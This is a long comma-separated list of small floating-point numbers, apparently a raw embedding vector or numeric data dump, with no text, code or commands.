0.021325143054127693, 0.020231114700436592, 0.0332753024995327, -0.02381616272032261, -0.02172909304499626, -0.007355238776654005, 0.013439721427857876, -0.03494159132242203, -0.00810001976788044, 0.002033420605584979, -0.00763295404613018, 0.039620667695999146, -0.00017804265371523798, 0.028663551434874535, -0.013128343969583511, -0.045006655156612396, 0.01844700612127781, -0.04638681560754776, -0.004889466799795628, -0.04248197376728058, 0.014399100095033646, 0.024405255913734436, -0.03463863208889961, -0.01418871060013771, -0.01030911598354578, -0.02085386961698532, 0.014331775717437267, -0.02191423624753952, 0.016048559918999672, -0.016157962381839752, 0.004031074699014425, -0.0032021377701312304, 0.013683773577213287, 0.017942070960998535, 0.012875876389443874, 0.00632853526622057, 0.006883964873850346, -0.0024152786936610937, 0.0016473546857014298, -0.0009083593613468111, -0.012724394910037518, 0.010721481405198574, 0.02878136932849884, -0.003890113439410925, -0.007443602662533522, 0.01418871060013771, -0.049517419189214706, -0.02512899786233902, -0.061736878007650375, -0.007094355300068855, -0.01935589127242565, -0.01212688721716404, -0.01592232473194599, -0.04009194299578667, -0.01716783456504345, -0.0008957359823398292, 0.04897882044315338, 0.023950811475515366, -0.00849976111203432, 0.0015063933096826077, -0.0065473406575620174, 0.029673423618078232, -0.026980429887771606, 0.008701736107468605, 0.01524066086858511, -0.001425393158569932, 0.01674705371260643, 0.006745107471942902, -0.0364564023911953, 0.004565465729683638, -0.006008741911500692, 0.03568216785788536, 0.006639912724494934, 0.0013570163864642382, -0.00036791973980143666, 0.03719697520136833, 0.011201170273125172, 0.031205063685774803, -0.025903232395648956, 0.004266711883246899, -0.023765668272972107, 0.016225287690758705, -0.01994498446583748, 0.019221242517232895, -0.005289207678288221, 0.014264450408518314, 0.004031074699014425, -0.013582786545157433, -0.0044686864130198956, -0.02147662453353405, 0.008971035480499268, 0.015274323523044586, 0.013237747363746166, 0.012101639993488789, 0.03398221358656883, 0.002444733399897814, -0.0009178269538097084, 0.005411234218627214, 0.00009342636622022837, 0.005116688087582588, 0.0013075746828690171, -0.02595372684299946, -0.00881955400109291, -0.00009033625974552706, -0.006715652998536825, 0.005621624179184437, -0.05736076459288597, 0.018749969080090523, 0.0015768740558996797, -0.010511090978980064, 0.0031937221065163612, -0.005688949022442102, 0.018564825877547264, 0.02107267454266548, 0.03413369506597519, -0.010973948985338211, -0.004241465125232935, -0.008794307708740234, 0.005247130058705807, -0.00795274693518877, -0.0045107644982635975, 0.0009330802131444216, -0.02211621031165123, 0.005752066150307655, -0.014786218293011189, -0.005095649044960737, -0.009745270945131779, -0.015291154384613037, 0.003778606653213501, 0.0029643969610333443, -0.0020712907426059246, -0.020752882584929466, 0.01742030307650566, -0.004704323131591082, -0.027973471209406853, 0.01849750056862831, 0.016881704330444336, -0.013077850453555584, -0.03480694442987442, 0.05520636960864067, -0.01782425120472908, -0.012758057564496994, -0.02063506469130516, -0.00831041019409895, 0.026997260749340057, 0.007136433385312557, -0.029808074235916138, 0.010847714729607105, -0.017235159873962402, 0.001333873369731009, 0.077288918197155, 0.013565955683588982, 0.010140804573893547, 0.012135302647948265, 0.020769713446497917, 0.03096942789852619, 0.0015390038024634123, -0.0025120582431554794, 0.019473711028695107, -0.04376114532351494, 0.026913104578852654, -0.03504258021712303, 0.007283706218004227, 0.050157006829977036, -0.005381779745221138, -0.029791241511702538, -0.015964403748512268, -0.028831863775849342, -0.033207979053258896, -0.0022722133435308933, 0.014146632514894009, -0.048204585909843445, -0.019456878304481506, 0.014819880947470665, 0.023900318890810013, -0.023782500997185707, -0.012025900185108185, -0.026694299653172493, -0.036153439432382584, 0.0035661126021295786, -0.01784108392894268, 0.034083202481269836, -0.02427060529589653, 0.027350716292858124, 0.010940286330878735, -0.014584244228899479, 0.03692767396569252, 0.016065390780568123, -0.014171878807246685, -0.02060140110552311, 0.006862925831228495, 0.02230135351419449, -0.0059498329646885395, -0.03696133941411972, 0.003073799889534712, 0.02772100269794464, -0.006240171380341053, -0.01171452272683382, -0.014171878807246685, -0.018632149323821068, 0.006917627528309822, 0.008213630877435207, 0.008676488883793354, 0.00424988055601716, 0.00900469720363617, 0.028040796518325806, -0.004140477627515793, 0.025078503414988518, 0.009290828369557858, -0.026795286685228348, 0.033140651881694794, 0.002132304012775421, 0.0038312042597681284, -0.018749969080090523, 0.0009446516633033752, 0.016258949413895607, 0.004540218971669674, -0.009661114774644375, 0.01645250804722309, -0.017336146906018257, -0.012816966511309147, 0.0009809440234676003, -0.020449921488761902, 0.020887531340122223, 0.016115883365273476, -0.017007937654852867, -0.016494587063789368, -0.0063874442130327225, 0.03243374079465866, 0.010157635435461998, 0.020029140636324883, 0.025398297235369682, -0.012589745223522186, -0.02618936263024807, -0.01297686342149973, 0.014314944855868816, 0.023748837411403656, -0.026492325589060783, -0.023765668272972107, 0.012699148617684841, 0.005937209352850914, -0.028175445273518562, 0.0025730712804943323, 0.0033662421628832817, -0.010569999925792217, 0.003330475650727749, -0.024758709594607353, 0.008436644449830055, 0.005945625249296427, 0.03611977770924568, 0.024826034903526306, 0.04167407751083374, 0.006059235893189907, -0.013776346109807491, 0.0020733948331326246, -0.039587005972862244, -0.03894742205739021, 0.021762754768133163, 0.01720149628818035, -0.021594442427158356, 0.006198093295097351, -0.023715175688266754, 0.02598738856613636, 0.021139999851584435, 0.02278945967555046, 0.02644183114171028, -0.011563041247427464, 0.006012950092554092, -0.015880247578024864, -0.03551385551691055, 0.00010821942123584449, 0.011377898044884205, -0.003420943394303322, 0.02341221272945404, -0.0150386868044734, 0.020887531340122223, -0.0020996935199946165, 0.020466752350330353, -0.0019576800987124443, 0.004146789666265249, 0.012892707251012325, -0.02516265958547592, -0.0012044834438711405, -0.022250860929489136, 0.019675685092806816, 0.013002109713852406, -0.027199236676096916, -0.02810812182724476, 0.013271409086883068, 0.030666464939713478, 0.020315270870923996, -0.022436004132032394, -0.014971361495554447, 0.009980907663702965, 0.03048132173717022, 0.008495553396642208, 0.01826186291873455, 0.0037828146014362574, 0.028932850807905197, 0.004565465729683638, -0.002829747274518013, -0.024758709594607353, -0.020870700478553772, -0.02768734097480774, 0.001195015967823565, -0.010283869691193104, 0.01763910800218582, -0.049517419189214706, -0.011950159445405006, -0.03537920489907265, 0.0009741063113324344, -0.002055511577054858, -0.0017620173748582602, 0.017975732684135437, -0.031221894547343254, 0.008129474706947803, 0.023681512102484703, -0.030178360641002655, -0.012160549871623516, -0.004300374072045088, -0.04127012938261032, 0.014104554429650307, -0.0012107952497899532, -0.025701258331537247, 0.015089180320501328, -0.0020712907426059246, 0.010384856723248959, 0.0024973307736217976, 0.01888461783528328, -0.0035261386074125767, 0.018379680812358856, -0.04706006497144699, -0.0023353304713964462, 0.009475971572101116, 0.021156830713152885, -0.0145085034891963, 0.0007663460564799607, -0.006362197455018759, -0.010208128951489925, 0.01913708634674549, 0.00559216970577836, -0.01645250804722309, -0.023530032485723495, -0.04450172185897827, -0.026997260749340057, -0.0039300876669585705, -0.02166176773607731, 0.030228853225708008, -0.02531414106488228, 0.00825570896267891, 0.006597834639251232, -0.04231366142630577, 0.011857587844133377, -0.011318989098072052, 0.01395307295024395, -0.0017841083463281393, -0.020281609147787094, 0.04881051182746887, -0.02529730834066868, 0.001014080480672419, 0.00440136156976223, -0.03194563835859299, 0.01599806547164917, -0.034874267876148224, -0.00169048469979316, 0.0059919110499322414, 0.015417388640344143, 0.018547993153333664, -0.007287913933396339, -0.007788642775267363, -0.028023965656757355, 0.013742683455348015, -0.0386444590985775, 0.022503327578306198, 0.012572914361953735, -0.015291154384613037, -0.0075151352211833, 0.028831863775849342, -0.05392719805240631, -0.009795764461159706, -0.0022595899645239115, -0.04594920575618744, 0.013145175762474537, -0.018379680812358856, 0.01030911598354578, -0.00891212560236454, 0.002648811787366867, 0.004262504167854786, 0.030801115557551384, 0.025061672553420067, -0.003606086829677224, 0.011310573667287827, -0.028276434168219566, -0.019204411655664444, -0.006412690971046686, 0.035076241940259933, 0.028091290965676308, -0.02108950726687908, 0.016662897542119026, -0.003296813229098916, -0.03374657779932022, -0.0036776193883270025, 0.023243902251124382, -0.006202301010489464, -0.0014495879877358675, -0.05177280306816101, -0.018396513536572456, -0.00375756761059165, -0.012732810340821743, 0.0019503164803609252, -0.005377571564167738, -0.0013496526516973972, -0.015392142347991467, 0.028225939720869064, -0.020281609147787094, 0.02664380520582199, -0.0009194048470817506, -0.031221894547343254, 0.007881213910877705, 0.01908659189939499, -0.002800292568281293, -0.0012602368369698524, 0.028613056987524033, -0.0010693077929317951, -0.013254578225314617, -0.02597055770456791, -0.01180709432810545, 0.0025688635651022196, 0.009114100597798824, 0.0018703682580962777, -0.02748536691069603, 0.001006190781481564, 0.008760645054280758, 0.026307182386517525, -0.004167828243225813, -0.039418693631887436, 0.019675685092806816, -0.04110181704163551, -0.015939155593514442, -0.006955497898161411, -0.010115557350218296, -0.022385509684681892, -0.006160222925245762, 0.012025900185108185, 0.02428743615746498, 0.00606344360858202, -0.005428065545856953, 0.002375304466113448, 0.013288240879774094, 0.003498787758871913, 0.00849976111203432, 0.004956791643053293, -0.021628106012940407, -0.030986258760094643, -0.031659506261348724, -0.001467471127398312, 0.003212657291442156, 0.037466272711753845, -0.006311703938990831, -0.0020113296341151, -0.012017483823001385, 0.036187101155519485, -0.020534075796604156, -0.0091477632522583, -0.005642663221806288, -0.006458976771682501, 0.015080764889717102, 0.02339538186788559, 0.036860350519418716, 0.0036439569666981697, -0.005125103518366814, -0.006623081397265196, 0.01395307295024395, -0.027115080505609512, -0.017958901822566986, -0.015535207465291023, 0.01535847969353199, -0.042010702192783356, 0.012480342760682106, -0.0040899841114878654, -0.011672444641590118, -0.016359936445951462, -0.005899339448660612, 0.013061019591987133, -0.0077086943201720715, 0.005024116486310959, -0.0214597936719656, -0.005217675119638443, 0.014104554429650307, -0.01641884632408619, -0.021846910938620567, -0.02384982444345951, -0.039620667695999146, 0.005575338378548622, -0.03154168650507927, -0.00013307176413945854, -0.0017651731614023447, 0.01264865417033434, 0.00881955400109291, 0.015459466725587845, -0.010738312266767025, -0.00956012774258852, 0.014643153175711632, 0.008571294136345387, -0.017151003703475, 0.021173663437366486, -0.030885271728038788, -0.0408325158059597, -0.0019366411725059152, -0.025852739810943604, -0.033140651881694794, 0.017689602449536324, -0.0015326921129599214, 0.03473961725831032, -0.011007611639797688, -0.029925892129540443, -0.018615318462252617, -0.0364564023911953, 0.00892054196447134, -0.03931770846247673, 0.01171452272683382, -0.01893511228263378, 0.0007247939938679338, 0.0012423536973074079, -0.0037891261745244265, -0.010460597462952137, 0.009964076802134514, 0.0062065087258815765, -0.027434872463345528, 0.023664681240916252, 0.024624060839414597, -0.034285176545381546, 0.01977667212486267, -0.01601489633321762, 0.019153917208313942, -0.02687944285571575, -0.026054713875055313, -0.030582308769226074, -0.03817318379878998, -0.008024279959499836, -0.015005024150013924, 0.014037229120731354, -0.012387771159410477, -0.004523387644439936, 0.03367925062775612, 0.0134060587733984, -0.03611977770924568, 0.01168927550315857, -0.029909061267971992, -0.0007842291961424053, -0.00009270315058529377, 0.0150302704423666, -0.023025095462799072, 0.015257492661476135, 0.0037281131371855736, 0.0013885748339816928, 0.014550581574440002, 0.017773758620023727, 0.015627779066562653, -0.029791241511702538, 0.032113950699567795, -0.009526465088129044, 0.009921998716890812, 0.027805158868432045, -0.010982364416122437, 0.01029228512197733, 0.0013075746828690171, 0.026980429887771606, 0.006172846537083387, 0.0008326189126819372, 0.00632432708516717, 0.015728766098618507, -0.01599806547164917, -0.002167018363252282, 0.021409299224615097, -0.03500891849398613, -0.017571784555912018, -0.011933328583836555, 0.020971687510609627, 0.015375310555100441, -0.02815861441195011, -0.014365438371896744, -0.022621147334575653, -0.013776346109807491, 0.028899189084768295, 0.03733162581920624, -0.00932449009269476, -0.008642826229333878, 0.01997864618897438, -0.013027356937527657, 0.061299268156290054, -0.01694902963936329, -0.01513125840574503, -0.02083703875541687, 0.0031979300547391176, -0.003311540698632598, 0.01524066086858511, 0.0024005514569580555, -0.005756273865699768, -0.018514331430196762, 0.022385509684681892, -0.009795764461159706, -0.007287913933396339, -0.030195191502571106, -0.01232886128127575, -0.013212500140070915, -0.011462054215371609, 0.009593789465725422, 0.00504094734787941, -0.0002795558830257505, -0.016578741371631622, -0.011647197417914867, 0.013532293029129505, -0.021358806639909744, 0.017285652458667755, -0.016519833356142044, -0.009913583286106586, -0.008470306172966957, -0.00198397901840508, -0.007889630272984505, 0.004683284088969231, -0.002270109485834837, -0.06143391877412796, 0.014979776926338673, 0.007355238776654005, -0.022924108430743217, -0.01200906839221716, -0.00998932309448719, -0.020365765318274498, -0.0018335499335080385, -0.003486164379864931, -0.018598487600684166, -0.026492325589060783, 0.007691862992942333, 0.010687818750739098, 0.0922350361943245, 0.03753359988331795, 0.0015916012926027179, -0.0001725199108477682, -0.01784108392894268, -0.023530032485723495, -0.013591201975941658, 0.030868439003825188, 0.021375637501478195, -0.018514331430196762, 0.03820684924721718, -0.002221719827502966, 0.010586831718683243, -0.013910995796322823, -0.008041110821068287, 0.005432273261249065, -0.00038738083094358444, -0.00772552564740181, -0.005125103518366814, 0.0054869744926691055, -0.0021060050930827856, 0.026711130514740944, 0.01115909218788147, -0.008777475915849209, -0.002619357081130147, -0.03669203817844391, 0.003519826801493764, 0.01180709432810545, -0.030010048300027847, -0.007178511004894972, -0.012951616197824478, -0.005718403495848179, -0.003290501656010747, -0.005836222320795059, 0.0014075100189074874, -0.009358152747154236, 0.016646066680550575, 0.0003013838722836226, 0.00965269934386015, -0.0023921357933431864, 0.01893511228263378, -0.014878789894282818, 0.015198582783341408, -0.013162006624042988, 0.0118239251896739, -0.006976536475121975, 0.022587483748793602, -0.005343909375369549, -0.018144045025110245, -0.02509533427655697, -0.017151003703475, -0.029319968074560165, -0.004881050903350115, 0.02534780278801918, -0.010342778638005257, 0.016974275931715965, -0.005693156737834215, 0.0062275477685034275, 0.025280477479100227, -0.04164041578769684, -0.001935589243657887, 0.007376277819275856, 0.01159670390188694, 0.025263646617531776, -0.007170095574110746, -0.026593312621116638, -0.012067978270351887, -0.0003800171834882349, 0.008525008335709572, 0.006349574308842421, 0.0023500577080994844, 0.0036292297299951315, 0.014441178180277348, -0.01999547705054283, 0.016603989526629448, 0.028831863775849342, -0.021190494298934937, 0.019692515954375267, -0.017874745652079582, -0.012152133509516716, 0.034470319747924805, 0.025381464511156082, -0.0043929461389780045, 0.011891250498592854, -0.01996181532740593, -0.0018619525944814086, -0.0015810817712917924, 0.0134144751355052, -0.012177380733191967, -0.015804506838321686, 0.018177706748247147, 0.00923191849142313, 0.003717593615874648, 0.008676488883793354, 0.004855804145336151, -0.018850956112146378, 0.003742840373888612, -0.027434872463345528, -0.006391651928424835, -0.017891576513648033, 0.0009788400493562222, 0.014651568606495857, 0.02536463364958763, 0.003938503097742796, -0.031036751344799995, -0.00923191849142313, 0.008609164506196976, 0.021527118980884552, 0.002153343055397272, -0.0016105364775285125, -0.02598738856613636, -0.0018535370472818613, 0.004193075466901064, -0.024119123816490173, 0.013624864630401134, -0.005032531917095184, 0.0011781847570091486, -0.007376277819275856, -0.0038543471600860357, -0.03551385551691055, -0.02406863123178482, -0.00026929937303066254, 0.016738638281822205, -0.01590549387037754, 0.005651078652590513, 0.007813889533281326, -0.01041010394692421, -0.01469364669173956, 0.037062324583530426, 0.020971687510609627, 0.011680860072374344, 0.016486169770359993, -0.006475808098912239, 0.0015600428450852633, 0.030599139630794525, -0.005933001637458801, 0.021560780704021454, 0.013018941506743431, 0.008289370685815811, 0.01138631347566843, -0.0011834445176646113, 0.02664380520582199, 0.00934973731637001, 0.010031401179730892, 0.02489336021244526, -0.017066847532987595, -0.015400557778775692, 0.02189740538597107, 0.0021649145055562258, 0.023900318890810013, -0.005987702868878841, -0.006913419812917709, 0.024405255913734436, 0.024977516382932663, 0.030801115557551384, -0.006488431710749865, 0.0004557576321531087, -0.020668726414442062, -0.011108598671853542, 0.009366568177938461, -0.0030422413256019354, 0.030363503843545914, 0.016225287690758705, -0.017125757411122322, 0.0019229657482355833, 0.015215414576232433, -0.0054659354500472546, -0.045208629220724106, -0.03157535195350647, -0.014180295169353485, -0.01127691101282835, 0.022486496716737747, -0.024523073807358742, -0.016721807420253754, 0.027535859495401382, 0.01893511228263378, -0.028613056987524033, -0.0023858239874243736, -0.010553169064223766, -0.007910668849945068, -0.01074672769755125, 0.029572436586022377, -0.00040289710159413517, -0.012185796163976192, 0.029151655733585358, -0.0064084832556545734, 0.01629261113703251, -0.023782500997185707, -0.014929283410310745, -0.004306686110794544, 0.020685557276010513, 0.027603184804320335, -0.00173361471388489, -0.011302157305181026, -0.01687328889966011, -0.011630366556346416, -0.009391815401613712, -0.005343909375369549, 0.01607380621135235, 0.007637161761522293, 0.011815509758889675, 0.008996281772851944, -0.01592232473194599, -0.00623175548389554, 0.01299369428306818, -0.023900318890810013, 0.020466752350330353, 0.014575827866792679, -0.01620003953576088, -0.02213304117321968, -0.01320408470928669, 0.00891212560236454, 0.021005351096391678, 0.015821337699890137, 0.02834375761449337, 0.006614665500819683, 0.01514808926731348, -0.01138631347566843, 0.00868490431457758, 0.012530836276710033, -0.011588288471102715, 0.012572914361953735, 0.004653829615563154, 0.021510286256670952, -0.011091767810285091, -0.003652372630313039, 0.039654333144426346, 0.0072710830718278885, -0.008184175938367844, 0.013077850453555584, 0.0030275138560682535, 0.014702062122523785, 0.03672569990158081, 0.009366568177938461, 0.012682316824793816, 0.006623081397265196, 0.010022985748946667, -0.012917953543365002, 0.013944657519459724, -0.005385987460613251, -0.005537468008697033, 0.0101997135207057, -0.015080764889717102, 0.002354265656322241, -0.0023584733717143536, -0.0002611467498354614, 0.016048559918999672, 0.043963123112916946, -0.007670823950320482, 0.003374657593667507, -0.01950737275183201, 0.025852739810943604, 0.0018272382440045476, -0.010393272154033184, -0.011083352379500866, 0.009576958604156971, 0.020029140636324883, -0.015602531842887402, 0.007982201874256134, -0.019153917208313942, 0.014272866770625114, -0.0011234832927584648, -0.011361067183315754, -0.00170521205291152, -0.019221242517232895, 0.021543949842453003, -0.007262667175382376, -0.009046775288879871, -0.025229984894394875, -0.006299080327153206, 0.0006527353543788195, 0.005385987460613251, 0.02021428383886814, 0.009391815401613712, -0.013473384082317352, -0.0027645262889564037, -0.009156178683042526, -0.025280477479100227, -0.01469364669173956, 0.0035513853654265404, 0.004184659570455551, 0.01698269136250019, 0.013944657519459724, -0.02529730834066868, -0.0033620342146605253, 0.04150576516985893, -0.009720023721456528, -0.01886778697371483, -0.0043719070963561535, 0.004291958641260862, 0.013397643342614174, -0.004695907700806856, -0.011588288471102715, -0.02273896522819996, 0.0027371756732463837, 0.018076719716191292, -0.01565302535891533, 0.043289873749017715, -0.004493933171033859, -0.0030443451832979918, 0.027821991592645645, -0.0006469496292993426, -0.006357989739626646, 0.009198256768286228, -0.009804179891943932, -0.0007542486418969929, -0.004355075769126415, 0.0005322870565578341, 0.022671639919281006, -0.0012654965976253152, 0.03500891849398613, -0.004102607723325491, -0.012000652961432934, -0.020096465945243835, 0.00976210180670023, 0.0028276434168219566, 0.006463184952735901, 0.003856451017782092, 0.00623175548389554, -0.0023079796228557825, 0.03591780364513397, 0.010973948985338211, 0.0015400557313114405, -0.043256212025880814, 0.005587961990386248, -0.0070901475846767426, -0.0006295924540609121, 0.00303172180429101, 0.01460107509046793, 0.0038880095817148685, 0.01086454652249813, 0.026711130514740944, -0.000436559523222968, 0.006778770126402378, -0.00778022687882185, 0.013136759400367737, -0.012312030419707298, 0.001432756776921451, -0.005171389319002628, -0.02558344043791294, -0.02406863123178482, 0.017908407375216484, -0.008453475311398506, -0.023109251633286476, 0.025431958958506584, -0.01996181532740593, 0.05308563634753227, 0.006395860109478235, 0.010123972781002522, -0.020517244935035706, -0.013658527284860611, -0.005579546093940735, -0.012614992447197437, -0.004544426687061787, 0.01386891771107912, -0.005133518949151039, 0.018076719716191292, -0.025886401534080505, -0.015644609928131104, -0.029942722991108894, -0.017975732684135437, -0.0032799821346998215, 0.00014267080405261368, -0.01709209382534027, -0.033174317330121994, 0.0007342615281231701, -0.030245685949921608, 0.005794144235551357, 0.013380812481045723, -0.00308852712623775, -0.011554625816643238, -0.006698821671307087, 0.005352324806153774, 0.001649458659812808, -0.005520637147128582, 0.028848694637417793, 0.023328058421611786, -0.0011161196744069457, -0.010418519377708435, 0.028714044019579887, 0.011133845895528793, -0.02257065288722515, 0.01663765124976635, -0.0007747616618871689, -0.02767051011323929, -0.011664029210805893, -0.013910995796322823, 0.004973622504621744, 0.00638323649764061, 0.00965269934386015, 0.013136759400367737, 0.024994347244501114, -0.00844505988061428, 0.02837742120027542, 0.0009593790164217353, 0.008827969431877136, 0.004561258014291525, 0.0058320146054029465, -0.016258949413895607, 0.01061207801103592, 0.004624375142157078, 0.019204411655664444, -0.009072022512555122, 0.014289697632193565, 0.022385509684681892, -0.013035772368311882, 0.008945788256824017, -0.01893511228263378, 0.021644936874508858, -0.02553294599056244, 0.02107267454266548, -0.011765016242861748, 0.03287135437130928, -0.014870374463498592, -0.009358152747154236, -0.02169542945921421, -0.011032858863472939, 0.006867134012281895, 0.009114100597798824, 0.007384693715721369, -0.00792749971151352, 0.016267364844679832, -0.009930414147675037, -0.030666464939713478, 0.004028970841318369, 0.010384856723248959, 0.03194563835859299, -0.04312156140804291, 0.0060886903665959835, 0.039418693631887436, -0.004359283484518528, 0.024152787402272224, 0.016334690153598785, 0.006261210422962904, 0.00042025427683256567, -0.01610746793448925, -0.0027329677250236273, 0.0007247939938679338, -0.004388737957924604, 0.019187578931450844, -0.01246351096779108, -0.005983495153486729, -0.020971687510609627, -0.003507203422486782, 0.01762227714061737, -0.0033978004939854145, 0.0031200856901705265, -0.0018335499335080385, 0.008937372826039791, 0.002857097890228033, 0.03524455428123474, 0.007443602662533522, -0.003869074396789074, -0.015097595751285553, 0.0021491351071745157, -0.011007611639797688, 0.02575175277888775, -0.0065263016149401665, 0.005352324806153774, -0.015316401608288288, 0.015173336490988731, -0.01640201359987259, 0.01888461783528328, 0.004796894732862711, -0.0025183698162436485, 0.021796418353915215, 0.0034903723280876875, -0.02834375761449337, 0.0009062555036507547, -0.00987992063164711, 0.029538774862885475, -0.012244705110788345, 0.016898535192012787, 0.00003358023604960181, 0.005768897477537394, -0.01848066970705986, -0.019456878304481506, -0.01625053398311138, 0.012168965302407742, 0.01762227714061737, 0.005116688087582588, 0.0002614097320474684, -0.007043861318379641, -0.009341321885585785, 0.01246351096779108, 0.04052955284714699, 0.00881955400109291, 0.026576481759548187, -0.0009315023198723793, 0.013372397050261497, 0.005247130058705807, 0.00976210180670023, -0.007287913933396339, 0.0134144751355052, 0.001361224101856351, -0.011419976130127907, -0.006568379700183868, 0.010721481405198574, 0.0050914413295686245, -0.004493933171033859, -0.0015263804234564304, -0.0017136276001110673, 0.025482453405857086, -0.010039816610515118, 0.014432762749493122, -0.020466752350330353, -0.001445380155928433, -0.013456552289426327, 0.025448789820075035, -0.0016515625175088644, 0.015829753130674362, 0.007498304359614849, 0.006164430640637875, 0.008356695994734764, -0.009829427115619183, 0.0016463027568534017, -0.004582297056913376, -0.012800135649740696, -0.012362523935735226, -0.006332742981612682, 0.002541512716561556, 0.005979287438094616, 0.003423047484830022, -0.010511090978980064, -0.0034125279635190964, 0.006513678468763828, -0.010788805782794952, 0.012362523935735226, -0.02209937945008278, -0.021981561556458473, 0.005996118765324354, -0.0204330887645483, -0.000010404449312773068, -0.026593312621116638, 0.00853763148188591, -0.001768329064361751, 0.025482453405857086, 0.003648164914920926, 0.007540382444858551, -0.011436806991696358, 0.0042772311717271805, -0.012606577016413212, 0.0020702388137578964, 0.005036739632487297, -0.0019545243121683598, -0.015493129380047321, 0.02384982444345951, -0.0258022453635931, -0.01460107509046793, 0.010342778638005257, -0.021510286256670952, -0.018110381439328194, -0.0028234354685992002, -0.005175597034394741, 0.002144927391782403, 0.0036166063509881496, -0.004674868658185005, -0.017016353085637093, -0.0077844345942139626, -0.0005002025282010436, -0.0008752229623496532, 0.0028528901748359203, 0.0021270441357046366, 0.014146632514894009, 0.005343909375369549, 0.010670986957848072, 0.007561421487480402, 0.020449921488761902, -0.004624375142157078, -0.021796418353915215, -0.003200033912435174, 0.0072290049865841866, -0.006795600987970829, 0.0036166063509881496, -0.016704976558685303, 0.019069761037826538, -0.019221242517232895, 0.009921998716890812, 0.03591780364513397, 0.015619363635778427, 0.012084809131920338, 0.012539251707494259, -0.0024405254516750574, -0.007384693715721369, -0.002249070443212986, 0.0028486824594438076, 0.006639912724494934, -0.003772295080125332, -0.009181424975395203, -0.018379680812358856, -0.002598318038508296, 0.0053901951760053635, -0.014786218293011189, -0.007069108542054892, -0.019608359783887863, 0.02664380520582199, -0.01740347221493721, -0.010654156096279621, -0.0003760723629966378, 0.005516429431736469, -0.0022806290071457624, 0.00763295404613018, -0.008036903105676174, 0.002200680784881115, -0.014247619546949863, 0.01848066970705986, 0.016359936445951462, 0.009534880518913269, -0.015333232469856739, -0.005920378025621176, 0.018850956112146378, -0.041573088616132736, 0.015173336490988731, 0.0033830732572823763, 0.007628746330738068, 0.013700605370104313, 0.01780742034316063, -0.011074936017394066, 0.0024068630300462246, -0.013507046736776829, 0.010847714729607105, 0.019591528922319412, 0.006261210422962904, -0.0009230867144651711, 0.002579383086413145, -0.009534880518913269, 0.006000326480716467, 0.01471047755330801, 0.000042768369894474745, -0.006332742981612682, -0.0024005514569580555, 0.028074458241462708, 0.010208128951489925, 0.002817123895511031, 0.006501054856926203, 0.03591780364513397, -0.010098726488649845, 0.009173009544610977, -0.010174466297030449, -0.011495716869831085, 0.017740095034241676, -0.0033494108356535435, -0.0009546452201902866, 0.014180295169353485, -0.006913419812917709, 0.011933328583836555, -0.009282412938773632, -0.005436480976641178, 0.0091477632522583, -0.0004121016536373645, 0.026761624962091446, 0.022082548588514328, 0.008306202478706837, 0.007161680143326521, 0.006905003916472197, -0.02857939526438713, -0.03736528754234314, -0.023967644199728966, 0.011773431673645973, 0.020938025787472725, 0.00466645322740078, -0.005651078652590513, -0.004178347997367382, 0.021510286256670952, 0.010342778638005257, 0.01864898018538952, 0.0017167835030704737, -0.018430175259709358, 0.009105685167014599, 0.021745923906564713, 0.007170095574110746, 0.02083703875541687, 0.014988193288445473, -0.001097184489481151, 0.00405000988394022, 0.0043508680537343025, -0.007296329829841852, -0.0204330887645483, -0.023765668272972107, 0.016393598169088364, 0.008003240451216698, 0.016646066680550575, -0.006181261967867613, 0.0011140157002955675, -0.0033935927785933018, -0.008562878705561161, 0.0072500440292060375, -0.012429849244654179, -0.0027413833886384964, -0.008987866342067719, 0.001871420186944306, -0.005558507051318884, 0.010182882659137249, -0.010351194068789482, 0.0028486824594438076, -0.009518049657344818, 0.0016431469703093171, 0.01640201359987259, 0.004251984413713217, -0.01558570098131895, 0.0107298968359828, 0.0011697690933942795, -0.015400557778775692, -0.015350064262747765, -0.024438917636871338, 0.023328058421611786, 0.01386050134897232, -0.023563694208860397, -0.00825570896267891, -0.010031401179730892, 0.040260255336761475, 0.006909211631864309, 0.000936762080527842, -0.003751256037503481, 0.0009083593613468111, 0.005411234218627214, -0.007485680747777224, -0.0058109755627810955, 0.012480342760682106, 0.0007090147119015455, -0.004658037330955267, 0.0016042247880250216, -0.012867460027337074, -0.019170748069882393, -0.0044897254556417465, -0.00005828464054502547, 0.006677782628685236, -0.001006190781481564, -0.005554299335926771, 0.017958901822566986, 0.021628106012940407, 0.0003213709278497845, 0.025903232395648956, -0.002570967422798276, -0.00003425414251978509, -0.004010035656392574, 0.003829100402072072, -0.005259753204882145, 0.0012749641900882125, 0.0005180856678634882, 0.02105584368109703, 0.017975732684135437, -0.00527237681671977, -0.0007042809738777578, -0.013439721427857876, -0.006900796201080084, -0.002153343055397272, 0.01935589127242565, -0.015484713949263096, 0.027333885431289673, -0.001641042996197939, -0.005095649044960737, 0.018834125250577927, -0.0009688465506769717, 0.0034630214795470238, 0.007822304964065552, -0.01010714191943407, -0.013927826657891273, -0.002381616272032261, -0.006021365523338318, -0.003585047787055373, -0.0007421511691063643, -0.004956791643053293, 0.0002990169741678983, 0.01954103447496891, 0.009265581145882607, 0.00606344360858202, -0.010771974921226501, -0.0010009310208261013, -0.02108950726687908, -0.012261536903679371, 0.00880272313952446, 0.005293415859341621, -0.004557050298899412, 0.015307986177504063, -0.005869884509593248, -0.005937209352850914, -0.015880247578024864, -0.01994498446583748, 0.011672444641590118, 0.028091290965676308, -0.01581292226910591, 0.0193053986877203, 0.0019219138193875551, -0.012345693074166775, 0.009391815401613712, -0.007052277214825153, 0.015838168561458588, 0.029690254479646683, -0.01974301040172577, -0.016157962381839752, -0.01654507964849472, 0.01373426802456379, -0.0065094707533717155, 0.0035682166926562786, 0.009526465088129044, 0.022436004132032394, 0.0032021377701312304, 0.0017010042211040854, 0.0045318035408854485, 0.003597671166062355, -0.00018869365158025175, -0.020113296806812286, -0.007919084280729294, 0.02147662453353405, 0.01848066970705986, 0.010115557350218296, 0.014895620755851269, 0.010763559490442276, 0.0016536663752049208, -0.013490214943885803, 0.0038101652171462774, -0.01742030307650566, -0.0038522433023899794, 0.0016894327709451318, 0.013936242088675499, -0.004258296452462673, 0.014155047945678234, 0.012455095537006855, 0.005802559666335583, 0.015005024150013924, -0.010334363207221031, 0.004359283484518528, -0.004451855085790157, 0.003536658128723502, -0.0021039012353867292, 0.015821337699890137, -0.011226417496800423, 0.00045102383592166007, -0.011377898044884205, -0.027367547154426575, -0.009130931459367275, 0.0150386868044734, -0.022722134366631508, 0.0032463197130709887, 0.002339538186788559, -0.019271735101938248, -0.0344029925763607, 0.011731353588402271, -0.0023458499927073717, 0.012320445850491524, 0.0009188788826577365, 